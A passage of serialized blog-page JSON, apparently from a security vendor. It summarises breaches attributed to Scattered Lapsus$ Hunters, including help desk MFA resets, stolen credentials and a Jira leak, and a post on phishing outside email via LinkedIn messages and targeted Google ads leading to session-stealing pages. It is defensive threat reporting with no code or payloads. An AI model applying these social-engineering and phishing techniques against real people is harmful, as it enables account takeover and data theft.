ype":318},[],{"nodeType":178,"data":62089,"content":62090},{},[62091],{"nodeType":173,"value":896,"marks":62092,"data":62095},[62093,62094],{"type":370},{"type":194},{},{"nodeType":178,"data":62097,"content":62098},{},[62099],{"nodeType":173,"value":905,"marks":62100,"data":62101},[],{},{"nodeType":178,"data":62103,"content":62104},{},[62105],{"nodeType":173,"value":912,"marks":62106,"data":62109},[62107,62108],{"type":370},{"type":194},{},{"nodeType":178,"data":62111,"content":62112},{},[62113,62116,62122,62125,62131,62134,62140],{"nodeType":173,"value":921,"marks":62114,"data":62115},[],{},{"nodeType":186,"data":62117,"content":62118},{"uri":926},[62119],{"nodeType":173,"value":929,"marks":62120,"data":62121},[],{},{"nodeType":173,"value":933,"marks":62123,"data":62124},[],{},{"nodeType":186,"data":62126,"content":62127},{"uri":938},[62128],{"nodeType":173,"value":941,"marks":62129,"data":62130},[],{},{"nodeType":173,"value":945,"marks":62132,"data":62133},[],{},{"nodeType":186,"data":62135,"content":62136},{"uri":950},[62137],{"nodeType":173,"value":953,"marks":62138,"data":62139},[],{},{"nodeType":173,"value":957,"marks":62141,"data":62142},[],{},{"nodeType":231,"data":62144,"content":62145},{},[],{"nodeType":235,"data":62147,"content":62148},{},[62149],{"nodeType":173,"value":967,"marks":62150,"data":62152},[62151],{"type":370},{},{"nodeType":178,"data":62154,"content":62155},{},[62156],{"nodeType":173,"value":975,"marks":62157,"data":62160},[62158,62159],{"type":370},{"type":194},{},{"nodeType":178,"data":62162,"content":62163},{},[62164,62167,62174],{"nodeType":173,"value":984,"marks":62165,"data":62166},[],{},{"nodeType":186,"data":62168,"content":62169},{"uri":989},[62170],{"nodeType":173,"value":992,"marks":62171,"data":62173},[62172],{"type":194},{},{"nodeType":173,"value":997,"marks":62175,"data":62176},[],{},{"nodeType":178,"data":62178,"content":62179},{},[62180],{"nodeType":173,"value":1004,"marks":62181,"data":62184},[62182,62183],{"type":370},{"type":194},{},{"nodeType":178,"data":62186,"content":62187},{},[62188],{"nodeType":173,"value":1013,"marks":62189,"data":62190},[],{},{"nodeType":178,"data":62192,"content":62193},{},[62194],{"nodeType":173,"value":1020,"marks":62195,"data":62198},[62196,62197],{"type":370},{"type":194},{},{"nodeType":178,"data":62200,"content":62201},{},[62202,62205,62212,62215,62222],{"nodeType":173,"value":1029,"marks":62203,"data":62204},[],{},{"nodeType":186,"data":62206,"content":62207},{"uri":1034},[62208],{"nodeType":173,"value":1037,"marks":62209,"data":62211},[62210],{"type":194},{},{"nodeType":173,"value":1042,"marks":62213,"data":62214},[],{},{"nodeType":186,"data":62216,"content":62217},{"uri":1047},[62218],{"nodeType":173,"value":1050,"marks":62219,"data":62221},[62220],{"type":194},{},{"nodeType":173,"value":1055,"marks":62223,"data":62224},[],{},{"nodeType":312,"data":62226,"content":62229},{"target":62227},{"sys":62228},{"id":1062,"type":317,"linkType":318},[],{"nodeType":178,"data":62231,"content":62232},{},[62233],{"nodeType":173,"value":1068,"marks":62234,"data":62237},[62235,62236],{"type":370},{"type":194},{},{"nodeType":178,"data":62239,"content":62240},{},[62241],{"nodeType":173,"value":1077,"marks":62242,"data":62243},[],{},{"nodeType":312,"data":62245,"content":62248},{"target":62246},{"sys":62247},{"id":1084,"type":317,"linkType":318},[],{"nodeType":231,"data":62250,"content":62251},{},[],{"nodeType":235,"data":62253,"content":62254},{},[62255],{"nodeType":173,"value":1093,"marks":62256,"data":62258},[62257],{"type":370},{},{"nodeType":178,"data":62260,"content":62261},{},[62262],{"nodeType":173,"value":1101,"marks":62263,"data":62266},[62264,62265],{"type":370},{"type":194},{},{"nodeType":178,"data":62268,"content":62269},{},[62270],{"nodeType":173,"value":1110,"marks":62271,"data":62272},[],{},{"nodeType":250,"data":62274,"content":62275},{},[62276,62289,62302],{"nodeType":254,"data":62277,"content":62278},{},[62279],{"nodeType":178,"data":62280,"content":62281},{},[62282,62286],{"nodeType":173,"value":1123,"marks":62283,"data":62285},[62284],{"type":370},{},{"nodeType":173,"value":1128,"marks":62287,"data":62288},[],{},{"nodeType":254,"data":62290,"content":62291},{},[62292],{"nodeType":178,"data":62293,"content":62294},{},[62295,62299],{"nodeType":173,"value":1138,"marks":62296,"data":62298},[62297],{"type":370},{},{"nodeType":173,"value":1143,"marks":62300,"data":62301},[],{},{"nodeType":254,"data":62303,"content":62304},{},[62305],{"nodeType":178,"data":62306,"content":62307},{},[62308,62312,62315,62321],{"nodeType":173,"value":1153,"marks":62309,"data":62311},[62310],{"type":370},{},{"nodeType":173,"value":1158,"marks":62313,"data":62314},[],{},{"nodeType":186,"data":62316,"content":62317},{"uri":1163},[62318],{"nodeType":173,"value":1166,"marks":62319,"data":62320},[],{},{"nodeType":173,"value":1170,"marks":62322,"data":62323},[],{},{"nodeType":312,"data":62325,"content":62328},{"target":62326},{"sys":62327},{"id":1177,"type":317,"linkType":318},[],{"nodeType":231,"data":62330,"content":62331},{},[],{"nodeType":235,"data":62333,"content":62334},{},[62335],{"nodeType":173,"value":1186,"marks":62336,"data":62338},[62337],{"type":370},{},{"nodeType":178,"data":62340,"content":62341},{},[62342],{"nodeType":173,"value":1194,"marks":62343,"data":62346},[62344,62345],{"type":370},{"type":194},{},{"nodeType":178,"data":62348,"content":62349},{},[62350],{"nodeType":173,"value":1203,"marks":62351,"data":62352},[],{},{"nodeType":312,"data":62354,"content":62357},{"target":62355},{"sys":62356},{"id":1210,"type":317,"linkType":318},[],{"nodeType":231,"data":62359,"content":62360},{},[],{"nodeType":169,"data":62362,"content":62363},{},[62364],{"nodeType":173,"value":1219,"marks":62365,"data":62367},[62366],{"type":370},{},{"nodeType":178,"data":62369,"content":62370},{},[62371],{"nodeType":173,"value":1227,"marks":62372,"data":62373},[],{},{"nodeType":178,"data":62375,"content":62376},{},[62377],{"nodeType":173,"value":1234,"marks":62378,"data":62379},[],{},{"nodeType":250,"data":62381,"content":62382},{},[62383,62402,62421],{"nodeType":254,"data":62384,"content":62385},{},[62386],{"nodeType":178,"data":62387,"content":62388},{},[62389,62392,62399],{"nodeType":173,"value":1247,"marks":62390,"data":62391},[],{},{"nodeType":186,"data":62393,"content":62394},{"uri":1252},[62395],{"nodeType":173,"value":1255,"marks":62396,"data":62398},[62397],{"type":194},{},{"nodeType":173,"value":1260,"marks":62400,"data":62401},[],{},{"nodeType":254,"data":62403,"content":62404},{},[62405],{"nodeType":178,"data":62406,"content":62407},{},[62408,62411,62418],{"nodeType":173,"value":1270,"marks":62409,"data":62410},[],{},{"nodeType":186,"data":62412,"content":62413},{"uri":1275},[62414],{"nodeType":173,"value":1278,"marks":62415,"data":62417},[62416],{"type":194},{},{"nodeType":173,"value":1260,"marks":62419,"data":62420},[],{},{"nodeType":254,"data":62422,"content":62423},{},[62424],{"nodeType":178,"data":62425,"content":62426},{},[62427,62430,62437],{"nodeType":173,"value":1292,"marks":62428,"data":62429},[],{},{"nodeType":186,"data":62431,"content":62432},{"uri":1297},[62433],{"nodeType":173,"value":1300,"marks":62434,"data":62436},[62435],{"type":194},{},{"nodeType":173,"value":1260,"marks":62438,"data":62439},[],{},{"nodeType":178,"data":62441,"content":62442},{},[62443],{"nodeType":173,"value":1311,"marks":62444,"data":62445},[],{},{"nodeType":250,"data":62447,"content":62448},{},[62449,62462,62475,62488],{"nodeType":254,"data":62450,"content":62451},{},[62452],{"nodeType":178,"data":62453,"content":62454},{},[62455,62459],{"nodeType":173,"value":1324,"marks":62456,"data":62458},[62457],{"type":370},{},{"nodeType":173,"value":1329,"marks":62460,"data":62461},[],{},{"nodeType":254,"data":62463,"content":62464},{},[62465],{"nodeType":178,"data":62466,"content":62467},{},[62468,62472],{"nodeType":173,"value":1339,"marks":62469,"data":62471},[62470],{"type":370},{},{"nodeType":173,"value":1344,"marks":62473,"data":62474},[],{},{"nodeType":254,"data":62476,"content":62477},{},[62478],{"nodeType":178,"data":62479,"content":62480},{},[62481,62485],{"nodeType":173,"value":1354,"marks":62482,"data":62484},[62483],{"type":370},{},{"nodeType":173,"value":1359,"marks":62486,"data":62487},[],{},{"nodeType":254,"data":62489,"content":62490},{},[62491],{"nodeType":178,"data":62492,"content":62493},{},[62494,62498],{"nodeType":173,"value":1369,"marks":62495,"data":62497},[62496],{"type":370},{},{"nodeType":173,"value":1374,"marks":62499,"data":62500},[],{},{"nodeType":178,"data":62502,"content":62503},{},[62504],{"nodeType":173,"value":1381,"marks":62505,"data":62506},[],{},{"nodeType":231,"data":62508,"content":62509},{},[],{"nodeType":169,"data":62511,"content":62512},{},[62513],{"nodeType":173,"value":1391,"marks":62514,"data":62516},[62515],{"type":370},{},{"nodeType":178,"data":62518,"content":62519},{},[62520],{"nodeType":173,"value":1399,"marks":62521,"data":62522},[],{},{"nodeType":178,"data":62524,"content":62525},{},[62526],{"nodeType":173,"value":1406,"marks":62527,"data":62528},[],{},{"nodeType":312,"data":62530,"content":62533},{"target":62531},{"sys":62532},{"id":1413,"type":317,"linkType":318},[],{"nodeType":231,"data":62535,"content":62536},{},[],{"nodeType":169,"data":62538,"content":62539},{},[62540],{"nodeType":173,"value":1422,"marks":62541,"data":62543},[62542],{"type":370},{},{"nodeType":178,"data":62545,"content":62546},{},[62547],{"nodeType":173,"value":1430,"marks":62548,"data":62549},[],{},{"nodeType":178,"data":62551,"content":62552},{},[62553],{"nodeType":173,"value":1437,"marks":62554,"data":62555},[],{},{"nodeType":178,"data":62557,"content":62558},{},[62559],{"nodeType":173,"value":1444,"marks":62560,"data":62561},[],{},{"nodeType":178,"data":62563,"content":62564},{},[62565,62568,62575,62578,62585],{"nodeType":173,"value":1451,"marks":62566,"data":62567},[],{},{"nodeType":186,"data":62569,"content":62570},{"uri":1456},[62571],{"nodeType":173,"value":1459,"marks":62572,"data":62574},[62573],{"type":194},{},{"nodeType":173,"value":1464,"marks":62576,"data":62577},[],{},{"nodeType":186,"data":62579,"content":62580},{"uri":1469},[62581],{"nodeType":173,"value":1472,"marks":62582,"data":62584},[62583],{"type":194},{},{"nodeType":173,"value":1477,"marks":62586,"data":62587},[],{},{"entries":62589},{"hyperlink":62590,"inline":62591,"block":62592},[],[],[62593,62607,62621,62624,62651,62665,62679,62704,62718,62732],{"sys":62594,"__typename":5311,"content":62595,"name":62606,"title":118},{"id":574},{"json":62596},{"nodeType":165,"data":62597,"content":62598},{},[62599],{"nodeType":178,"data":62600,"content":62601},{},[62602],{"nodeType":173,"value":62603,"marks":62604,"data":62605},"The MGM hack resulted in a 36-hour outage, a $100M hit to its Q3 results, one-time cyber consulting fees in the region of $10M, and a class-action lawsuit later settled for $45M. Less is known about Caesars, except that a ransom of $15M was paid in an attempt to prevent stolen data being leaked online.",[],{},"SLH insight box 1",{"sys":62608,"__typename":5311,"content":62609,"name":62620,"title":118},{"id":587},{"json":62610},{"nodeType":165,"data":62611,"content":62612},{},[62613],{"nodeType":178,"data":62614,"content":62615},{},[62616],{"nodeType":173,"value":62617,"marks":62618,"data":62619},"The Marks & Spencer ransomware breach resulted in online shopping services being taken offline, stores running low on products, £300M in lost profits, and almost £1B wiped off the company’s stock market valuation at one stage. Co-op proactively pulled the plug on their network to prevent further damage, lessening the impact to a still-sizeable £107m in lost profits.",[],{},"SLH insight box 2",{"sys":62622,"__typename":5345,"title":32174,"caption":32174,"layoutMode":118,"file":62623},{"id":685},{"url":32176,"width":32177,"height":32178},{"sys":62625,"__typename":5311,"content":62626,"name":62650,"title":118},{"id":710},{"json":62627},{"nodeType":165,"data":62628,"content":62629},{},[62630],{"nodeType":178,"data":62631,"content":62632},{},[62633,62637,62646],{"nodeType":173,"value":62634,"marks":62635,"data":62636},"Stolen credentials were, and still are, one of the easiest ways in for an attacker. They're one of the most abundant resources available to attackers online, with billions leaked as a by-product of phishing, malware infections (infostealers), and data breaches, which are packaged up and resold to other criminals. Sure, ",[],{},{"nodeType":186,"data":62638,"content":62640},{"uri":62639},"https://pushsecurity.com/blog/verified-stolen-credential-detection/",[62641],{"nodeType":173,"value":62642,"marks":62643,"data":62645},"there’s a lot of noise in credential feeds",[62644],{"type":194},{},{"nodeType":173,"value":62647,"marks":62648,"data":62649}," — but it only takes the attacker to get lucky once. And the steady stream of breaches are living proof of the MFA gaps waiting to be exploited.",[],{},"SLH insight box 3",{"sys":62652,"__typename":5311,"content":62653,"name":62664,"title":118},{"id":890},{"json":62654},{"nodeType":165,"data":62655,"content":62656},{},[62657],{"nodeType":178,"data":62658,"content":62659},{},[62660],{"nodeType":173,"value":62661,"marks":62662,"data":62663},"A group calling themselves “The Crimson Collective” originally claimed the breach, with Scattered Lapsus$ Hunters becoming the main voice behind the breach at the extortion phase — showing just how interconnected the ecosystem of cybercriminals is.",[],{},"SLH insight box 10",{"sys":62666,"__typename":5311,"content":62667,"name":62678,"title":118},{"id":1062},{"json":62668},{"nodeType":165,"data":62669,"content":62670},{},[62671],{"nodeType":178,"data":62672,"content":62673},{},[62674],{"nodeType":173,"value":62675,"marks":62676,"data":62677},"An identical attack path was attempted against Co-op, but was detected early enough for the security team to pull the plug on their own network. This significantly reduced the disruption, although customer data was still taken by the attacker.",[],{},"SLH insight box 4",{"sys":62680,"__typename":5311,"content":62681,"name":62703,"title":118},{"id":1084},{"json":62682},{"nodeType":165,"data":62683,"content":62684},{},[62685],{"nodeType":178,"data":62686,"content":62687},{},[62688,62691,62699],{"nodeType":173,"value":37,"marks":62689,"data":62690},[],{},{"nodeType":186,"data":62692,"content":62693},{"uri":27726},[62694],{"nodeType":173,"value":62695,"marks":62696,"data":62698},"Jaguar’s Jira tenant was breached",[62697],{"type":194},{},{"nodeType":173,"value":62700,"marks":62701,"data":62702}," by the “Scattered Lapsus$ Hunters” affiliated “HellCat” group earlier in 2025, which led to an alleged ~350GB of data being stolen. It is highly likely that this inside information from Jira (a platform storing huge amounts of business process information, architectural diagrams, and even improperly stored credentials and secrets) was leveraged in the later ransomware breach.",[],{},"SLH insight box 5",{"sys":62705,"__typename":5311,"content":62706,"name":62717,"title":118},{"id":1177},{"json":62707},{"nodeType":165,"data":62708,"content":62709},{},[62710],{"nodeType":178,"data":62711,"content":62712},{},[62713],{"nodeType":173,"value":62714,"marks":62715,"data":62716},"The Salesloft breach in fact originated from a developer’s GitHub account being phished, which enabled the attacker to pivot into AWS, steal access tokens, and pivot to downstream customer environments.",[],{},"SLH insight box 6",{"sys":62719,"__typename":5311,"content":62720,"name":62731,"title":118},{"id":1210},{"json":62721},{"nodeType":165,"data":62722,"content":62723},{},[62724],{"nodeType":178,"data":62725,"content":62726},{},[62727],{"nodeType":173,"value":62728,"marks":62729,"data":62730},"While the CyberHaven attacks were conducted by an unknown threat group, the MO of the attacker — pursuing financial gain, bypassing traditional defenses — is very much in-line with the Scattered Lapsus$ Hunters TTPs observed. ",[],{},"SLH insight box 7",{"sys":62733,"__typename":5311,"content":62734,"name":62756,"title":118},{"id":1413},{"json":62735},{"nodeType":165,"data":62736,"content":62737},{},[62738],{"nodeType":178,"data":62739,"content":62740},{},[62741,62745,62752],{"nodeType":173,"value":62742,"marks":62743,"data":62744},"One of the common threads from all of these breaches is the risk posed by ",[],{},{"nodeType":186,"data":62746,"content":62747},{"uri":1034},[62748],{"nodeType":173,"value":62749,"marks":62750,"data":62751},"help desk attacks",[],{},{"nodeType":173,"value":62753,"marks":62754,"data":62755},", but it’s easy to over-index here. Naturally, making it possible for help desk operators to reset MFA for all users (including accounts with dangerous privileges) is always going to be targeted — but is fairly easy to address in principle by requiring escalations for high-risk changes. What is more interesting is that the vast majority of the help desk attacks featured in this article involved a single provider that is now no longer contracted by a number of the victims.",[],{},"SLH insight box 8","content:blog:scattered-lapsus-hunters.json","blog/scattered-lapsus-hunters.json","blog/scattered-lapsus-hunters",{"_path":62761,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":62762,"ogImage":118,"summary":62764,"title":21090,"subtitle":118,"metaTitle":21090,"synopsis":21091,"hashTags":118,"publishedDate":21092,"slug":21093,"tagsCollection":62774,"relatedBlogPostsCollection":62780,"authorsCollection":64459,"content":64463,"_id":65028,"_type":5439,"_source":5440,"_file":65029,"_stem":65030,"_extension":5439},"/blog/the-most-advanced-clickfix-yet",{"id":20516,"publishedAt":62763},"2025-11-06T10:00:13.092Z",{"json":62765},{"data":62766,"content":62767,"nodeType":165},{},[62768],{"data":62769,"content":62770,"nodeType":178},{},[62771],{"data":62772,"marks":62773,"value":21091,"nodeType":173},{},[],{"items":62775},[62776,62778],{"sys":62777,"name":509},{"id":508},{"sys":62779,"name":505},{"id":504},{"items":62781},[62782,63347,63894],{"__typename":1528,"sys":62783,"content":62785,"title":63333,"synopsis":63334,"hashTags":118,"publishedDate":63335,"slug":63336,"tagsCollection":63337,"authorsCollection":63343},{"id":62784},"4wtqKNN8D4tvbICAQ17L1Z",{"json":62786},{"data":62787,"content":62788,"nodeType":165},{},[62789,62797,62804,62811,62818,62824,62827,62835,62842,62849,62865,62907,62913,62920,62936,62943,62948,62951,62959,62966,62982,63002,63020,63040,63047,63050,63058,63076,63107,63112,63117,63120,63128,63146,63166,63173,63192,63198,63204,63207,63215,63222,63229,63261,63268,63271,63279,63286,63293,63300,63307],{"data":62790,"content":62791,"nodeType":169},{},[62792],{"data":62793,"marks":62794,"value":62796,"nodeType":173},{},[62795],{"type":370},"Phishing has moved outside of the mailbox",{"data":62798,"content":62799,"nodeType":178},{},[62800],{"data":62801,"marks":62802,"value":62803,"nodeType":173},{},[],"Because of the changes to working practices, employees are more accessible than ever to external attackers. Once upon a time, email was the primary communication channel with the wider world, and work happened locally — on your device, and inside your locked-down network environment. This made email and the endpoint the highest priority from a security perspective. ",{"data":62805,"content":62806,"nodeType":178},{},[62807],{"data":62808,"marks":62809,"value":62810,"nodeType":173},{},[],"But now, with modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it’s harder to stop users from interacting with malicious content.",{"data":62812,"content":62813,"nodeType":178},{},[62814],{"data":62815,"marks":62816,"value":62817,"nodeType":173},{},[],"Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration.",{"data":62819,"content":62823,"nodeType":312},{"target":62820},{"sys":62821},{"id":62822,"type":317,"linkType":318},"1tDciIJqKnNoR4FqZChjTy",[],{"data":62825,"content":62826,"nodeType":231},{},[],{"data":62828,"content":62829,"nodeType":169},{},[62830],{"data":62831,"marks":62832,"value":62834,"nodeType":173},{},[62833],{"type":370},"Why am I not hearing about this more? ",{"data":62836,"content":62837,"nodeType":178},{},[62838],{"data":62839,"marks":62840,"value":62841,"nodeType":173},{},[],"Phishing attacks outside of email usually go unreported. This is to be expected when most of the industry’s data on phishing attacks comes from email security vendors and tools. ",{"data":62843,"content":62844,"nodeType":178},{},[62845],{"data":62846,"marks":62847,"value":62848,"nodeType":173},{},[],"If phishing bypasses the email layer, most organizations are left relying on user reported attacks. Some organizations might supplement this with a web proxy, but these are being increasingly defeated by modern phishing kits, which use an array of obfuscation and detection evasion techniques to bypass these detections. ",{"data":62850,"content":62851,"nodeType":178},{},[62852,62856,62861],{"data":62853,"marks":62854,"value":62855,"nodeType":173},{},[],"The most valuable information for security teams today is the webpage that is loaded ",{"data":62857,"marks":62858,"value":62860,"nodeType":173},{},[62859],{"type":1646},"through",{"data":62862,"marks":62863,"value":62864,"nodeType":173},{},[]," the network traffic: What does the HTML body look like? What is the user likely seeing on the page? To do this, you need to stitch together and reconstruct what the browser is doing by looking at the network data. Except for very simple websites, this happens through JavaScript on the client side. ",{"data":62866,"content":62867,"nodeType":178},{},[62868,62872,62881,62884,62891,62894,62903],{"data":62869,"marks":62870,"value":62871,"nodeType":173},{},[],"This is hard enough when analysing a typical SaaS app. But the latest generation of fully customized Attacker-in-the-Middle (AitM) phishing kits are going out of their way to make this as challenging as possible, using techniques like ",{"data":62873,"content":62875,"nodeType":186},{"uri":62874},"https://phishing-techniques.pushsecurity.com/techniques/dom-obfuscation/",[62876],{"data":62877,"marks":62878,"value":62880,"nodeType":173},{},[62879],{"type":194},"DOM obfuscation",{"data":62882,"marks":62883,"value":2936,"nodeType":173},{},[],{"data":62885,"content":62886,"nodeType":186},{"uri":50125},[62887],{"data":62888,"marks":62889,"value":58281,"nodeType":173},{},[62890],{"type":194},{"data":62892,"marks":62893,"value":9534,"nodeType":173},{},[],{"data":62895,"content":62897,"nodeType":186},{"uri":62896},"https://phishing-techniques.pushsecurity.com/techniques/code-obfuscation/",[62898],{"data":62899,"marks":62900,"value":62902,"nodeType":173},{},[62901],{"type":194},"Code obfuscation",{"data":62904,"marks":62905,"value":62906,"nodeType":173},{},[]," so all you see at a network layer is a garbled, obfuscated mess of JS code.",{"data":62908,"content":62912,"nodeType":312},{"target":62909},{"sys":62910},{"id":62911,"type":317,"linkType":318},"71QsaPju68i5QiJcgQlHDs",[],{"data":62914,"content":62915,"nodeType":178},{},[62916],{"data":62917,"marks":62918,"value":62919,"nodeType":173},{},[],"So, non-email phishing is going broadly undetected through technical controls. And even when spotted and reported by a user — what can you really do about it?",{"data":62921,"content":62922,"nodeType":178},{},[62923,62927,62932],{"data":62924,"marks":62925,"value":62926,"nodeType":173},{},[],"Take a social media phish. You can’t see which other accounts were targeted or hit in your user base. Unlike email, there’s no way to recall or quarantine the same message hitting multiple users. There’s no rule you can modify, or senders you can block. You can report the account, and ",{"data":62928,"marks":62929,"value":62931,"nodeType":173},{},[62930],{"type":1646},"maybe",{"data":62933,"marks":62934,"value":62935,"nodeType":173},{},[]," something will happen when the site owner gets around to it — but the attacker has probably got what they needed by then and moved on. ",{"data":62937,"content":62938,"nodeType":178},{},[62939],{"data":62940,"marks":62941,"value":62942,"nodeType":173},{},[],"Most organizations simply block the URLs involved. But this doesn’t really help when attackers are rapidly rotating their phishing domains — by the time you block one site, another three have already taken its place. ",{"data":62944,"content":62947,"nodeType":312},{"target":62945},{"sys":62946},{"id":60266,"type":317,"linkType":318},[],{"data":62949,"content":62950,"nodeType":231},{},[],{"data":62952,"content":62953,"nodeType":169},{},[62954],{"data":62955,"marks":62956,"value":62958,"nodeType":173},{},[62957],{"type":370},"But aren’t these just personal accounts?",{"data":62960,"content":62961,"nodeType":178},{},[62962],{"data":62963,"marks":62964,"value":62965,"nodeType":173},{},[],"Modern phishing attacks blur the boundary between corporate and personal. The fact is that your employees are routinely accessing personal messaging and social media apps on their corporate devices. Users are signed into apps like LinkedIn, X, WhatsApp, Signal, even message boards like Reddit on their work laptop and/or mobile devices. And with malicious links being found on search engines (aka. malvertising), they can even stumble upon them while browsing the web normally.",{"data":62967,"content":62968,"nodeType":178},{},[62969,62973,62978],{"data":62970,"marks":62971,"value":62972,"nodeType":173},{},[],"In short: anywhere that your users can be contacted by someone outside of your organization presents an opportunity for phishing. In fact, in most of these cases people ",{"data":62974,"marks":62975,"value":62977,"nodeType":173},{},[62976],{"type":370},"expect ",{"data":62979,"marks":62980,"value":62981,"nodeType":173},{},[],"to be contacted by people they don’t know. ",{"data":62983,"content":62984,"nodeType":178},{},[62985,62989,62998],{"data":62986,"marks":62987,"value":62988,"nodeType":173},{},[],"It’s also a myth that campaigns can’t be targeted in the same way on these platforms, that they’re somehow more random and therefore less dangerous. For example, social media accounts are some of the easiest for attackers to create en masse — or take over. According to the most recent ",{"data":62990,"content":62992,"nodeType":186},{"uri":62991},"https://www.verizon.com/business/resources/T149/reports/2025-dbir-data-breach-investigations-report.pdf",[62993],{"data":62994,"marks":62995,"value":62997,"nodeType":173},{},[62996],{"type":194},"Verizon DBIR",{"data":62999,"marks":63000,"value":63001,"nodeType":173},{},[],", 60%+ of creds found in infostealer logs were from social media sites. They’re also likely to use single-factor logins. If an attacker can take over one account, and use it to credibly communicate with one of your employees, they have a way higher likelihood of being successful than with your average unsolicited email. ",{"data":63003,"content":63004,"nodeType":178},{},[63005,63009,63016],{"data":63006,"marks":63007,"value":63008,"nodeType":173},{},[],"Malicious ads can also be targeted. For example, Google Ads can be targeted to searches coming from specific geographic locations, tailored to specific email domain matches, or specific device types (e.g. desktop, mobile, etc.). If you know where your target organization is located, you can tailor the ad to that location. Phishing sites also often come with ",{"data":63010,"content":63011,"nodeType":186},{"uri":7853},[63012],{"data":63013,"marks":63014,"value":7856,"nodeType":173},{},[63015],{"type":194},{"data":63017,"marks":63018,"value":63019,"nodeType":173},{},[]," parameters to only deliver the malicious payload under specific conditions — for example, only if the visitor came from a particular email campaign link, or only if they are in a certain organization, using a certain browser, from a specific IP range, etc. ",{"data":63021,"content":63022,"nodeType":178},{},[63023,63027,63036],{"data":63024,"marks":63025,"value":63026,"nodeType":173},{},[],"And even if the attacker only manages to reach your employee on their personal device, this can still be laundered into a corporate account compromise. Just look at the ",{"data":63028,"content":63030,"nodeType":186},{"uri":63029},"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause",[63031],{"data":63032,"marks":63033,"value":63035,"nodeType":173},{},[63034],{"type":194},"2023 Okta breach",{"data":63037,"marks":63038,"value":63039,"nodeType":173},{},[],", where an attacker exploited the fact that an Okta employee had signed into a personal Google profile on their work device. This meant any credentials saved in their browser were synced to their personal device — including a customer support system service account providing access to 134 customer tenants. When their personal device got hacked, so too did all of their work credentials.",{"data":63041,"content":63042,"nodeType":178},{},[63043],{"data":63044,"marks":63045,"value":63046,"nodeType":173},{},[],"So, there’s plenty of scope for non-email phishing to result in targeted phishing campaigns. If anything, it’s arguably less work for the attacker to spin up these non-email campaigns than it is to do the necessary legwork to create and build up email sender reputation!",{"data":63048,"content":63049,"nodeType":231},{},[],{"data":63051,"content":63052,"nodeType":169},{},[63053],{"data":63054,"marks":63055,"value":63057,"nodeType":173},{},[63056],{"type":370},"Case study: LinkedIn spear-phishing",{"data":63059,"content":63060,"nodeType":178},{},[63061,63064,63072],{"data":63062,"marks":63063,"value":37,"nodeType":173},{},[],{"data":63065,"content":63066,"nodeType":186},{"uri":1764},[63067],{"data":63068,"marks":63069,"value":63071,"nodeType":173},{},[63070],{"type":194},"Attackers recently ran a LinkedIn spear-phishing campaign targeting tech company execs.",{"data":63073,"marks":63074,"value":63075,"nodeType":173},{},[]," The victims were targeted via LinkedIn direct message from another exec about a fake investment opportunity. The sender’s account had been compromised and used to approach high-value targets. ",{"data":63077,"content":63078,"nodeType":178},{},[63079,63083,63091,63095,63103],{"data":63080,"marks":63081,"value":63082,"nodeType":173},{},[],"The attack led the victim through a chain of custom pages hosted on ",{"data":63084,"content":63085,"nodeType":186},{"uri":58235},[63086],{"data":63087,"marks":63088,"value":63090,"nodeType":173},{},[63089],{"type":194},"legitimate sites",{"data":63092,"marks":63093,"value":63094,"nodeType":173},{},[]," (a well-known ",{"data":63096,"content":63098,"nodeType":186},{"uri":63097},"https://pushsecurity.com/resources/phishing-evolution?",[63099],{"data":63100,"marks":63101,"value":13298,"nodeType":173},{},[63102],{"type":194},{"data":63104,"marks":63105,"value":63106,"nodeType":173},{},[],") such as Google Sites, Google Search, and Microsoft Dynamics, before serving up an Attacker-in-the-Middle phishing page impersonating Google Workspace, before serving up a session-stealing AitM phishing page. ",{"data":63108,"content":63111,"nodeType":312},{"target":63109},{"sys":63110},{"id":59019,"type":317,"linkType":318},[],{"data":63113,"content":63116,"nodeType":312},{"target":63114},{"sys":63115},{"id":59074,"type":317,"linkType":318},[],{"data":63118,"content":63119,"nodeType":231},{},[],{"data":63121,"content":63122,"nodeType":169},{},[63123],{"data":63124,"marks":63125,"value":63127,"nodeType":173},{},[63126],{"type":370},"Case study: Google Search malvertising",{"data":63129,"content":63130,"nodeType":178},{},[63131,63134,63142],{"data":63132,"marks":63133,"value":37,"nodeType":173},{},[],{"data":63135,"content":63136,"nodeType":186},{"uri":14287},[63137],{"data":63138,"marks":63139,"value":63141,"nodeType":173},{},[63140],{"type":194},"A company was hit with a targeted Google ad",{"data":63143,"marks":63144,"value":63145,"nodeType":173},{},[]," which was designed to look highly convincing, and positioned above the legitimate ad. This took advantage of the fact that many users will search for login pages rather than accessing the site via bookmark. ",{"data":63147,"content":63148,"nodeType":178},{},[63149,63153,63162],{"data":63150,"marks":63151,"value":63152,"nodeType":173},{},[],"In this case, the attacker had made use of a ",{"data":63154,"content":63156,"nodeType":186},{"uri":63155},"https://phishing-techniques.pushsecurity.com/techniques/rentable-subdomains/",[63157],{"data":63158,"marks":63159,"value":63161,"nodeType":173},{},[63160],{"type":194},"rentable subdomain",{"data":63163,"marks":63164,"value":63165,"nodeType":173},{},[]," (us[.]com) to make the link appear highly legitimate, with only small changes to the real URL that were easy to miss. ",{"data":63167,"content":63168,"nodeType":178},{},[63169],{"data":63170,"marks":63171,"value":63172,"nodeType":173},{},[],"Instead of the real login, the link took the victim to a session-stealing AITM page.  ",{"data":63174,"content":63175,"nodeType":178},{},[63176,63180,63188],{"data":63177,"marks":63178,"value":63179,"nodeType":173},{},[],"This was later traced back to a ",{"data":63181,"content":63183,"nodeType":186},{"uri":63182},"https://pushsecurity.com/blog/scattered-spider-ttp-evolution-in-2025/",[63184],{"data":63185,"marks":63186,"value":25071,"nodeType":173},{},[63187],{"type":194},{"data":63189,"marks":63190,"value":63191,"nodeType":173},{},[]," campaign.",{"data":63193,"content":63197,"nodeType":312},{"target":63194},{"sys":63195},{"id":63196,"type":317,"linkType":318},"5o1LEkZfeYVjMZmROi3Yh",[],{"data":63199,"content":63203,"nodeType":312},{"target":63200},{"sys":63201},{"id":63202,"type":317,"linkType":318},"4RAXFNPdvUXjMDUE7tc10a",[],{"data":63205,"content":63206,"nodeType":231},{},[],{"data":63208,"content":63209,"nodeType":169},{},[63210],{"data":63211,"marks":63212,"value":63214,"nodeType":173},{},[63213],{"type":370},"What can an attacker do with a compromised account? 